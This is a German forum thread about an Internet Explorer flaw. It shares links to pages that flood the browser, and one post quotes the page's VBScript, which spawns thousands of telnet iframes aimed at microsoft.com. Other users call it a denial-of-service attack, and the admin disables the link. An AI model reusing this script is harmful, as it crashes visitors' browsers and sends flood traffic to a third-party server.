Sicherheitslücke Internet Explorer

[ThaWild 10]

Hier wieder eine Sicherheitslücke vom IE...

 

www.mozilla.linuxfaqs.de/Geil.jpg

 

Achtung! Nicht sehr empfehlenswert mit dem IE aufzumachen.

 

Do it on your own risk!

[saracs 10]

hi thawild,

 

was passiert denn wenn man den link mitm ie aufmacht!? habs mitm firebird geöffnet und bekomm nur ne meldung das das bild fehler enthält. wäre nett wenn du ein paar mehr infos dazu geben könntest ;)

 

gruss saracs

[ThaWild 10]

ausprobieren ;)

 

es zeigt nur eine IE-Sicherheitslücke auf, nix verheerendes, is ja von ner namhaften seite ;)

 

aber wer den link mitm IE aufmacht überlegt sich dann sicher ober weiterhin seine Bankgeschäfte oder ähnliches mit dem IE durchführt

 

Die Sicherheitslücken vom IE werden ja großteil verniedlicht aber der link veranschaulicht schon!

 

greez stefan

 

PS: Wie gesagt "auf eigene Gefahr ;)"

[gismo 10]

Habe es mal ausprobiert

 

erstmal meldet sich mein Virusscanner der ein virus entdeckt hat *VBS/DDos-iframeNet.a

 

und dann öffenen sich n aufen Hyperterminals zu Microsoft.com

 

ist schon krass was man so alles machen kann

[ThaWild 10]

is aber kein virus sondern nur ein script...;)

 

<edit>

n haufen = 12000 ;)

</edit>

[Lian 2.422]

Stimmt . . . nett - und so simpel :shock:

 

<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

 

das ganze ein ca. 10 mal hintereinander

 

Mein Scanner hat auch angeschlagen und mir sogar den Zugriff auf die Datei verweigert ;)

[Dr.Doom 10]

Natürlich mußte ich es auchsofort mal probieren !

Typisch eigendlich !!!!

Wenn ich nicht drauf vorbereitet gewesen wäre hätte ich mich echt erschrocken!!!

[thorgood 10]

Im Allgemeinen

 

fand ich dieses Board bisher sehr gut, informativ und seriös.

 

Hier einen Link zu veröffentlichen auf einen offiziell eingestuften

Trojaner der ein Denial Of Svc auf microsoft.com vornimmt finde

ich komplett am Ziel vorbei.

 

thorgood

[Lian 2.422]

Nun ja, selbst bei Heise findet man eine Liste aktueller Exploits:

http://www.heise.de/security/dienste/browsercheck/demos/ie/

 

Zur Abhilfe oben beschriebenen Exploits: Einzige Abhilfe ist derzeit, Active Scripting für die Internet-Zone zu deaktivieren (Heise).

[MiLLHouSe 15]

Ist das auf der nachfolgenden Seite dann auch sowas in der Art wie der obige Link?? (Vorsicht, es öffnen sich ewig viele Fensterchen!!!)

 

http://www.deutscherfussball.de.ms

 

 

BETRETEN AUF EIGENE GEFAHR!!!!

[thorgood 10]

Hallo Lian,

 

ja die tun das lokal auf dem PC. Der Link oben lässte bis zu

12000 Connections bei http://www.microsoft.com öffnen und das

stellt offiziell einen DOS Angriff dar.

Find ich für ein von Microsoft empfohlenem Board geschmacklos.

 

thorgood

[boardadmin 0]

Okay, der link ist jetzt nicht mehr anklickbar, mehr wäre Zensur bzw. Totschweigen,

 

Mir wäre der thread mit einem Hinweis zu einem Patch auch lieber, aber den gibt es leider (noch) nicht.

 

Ich denke, hier wäre MS gefragt.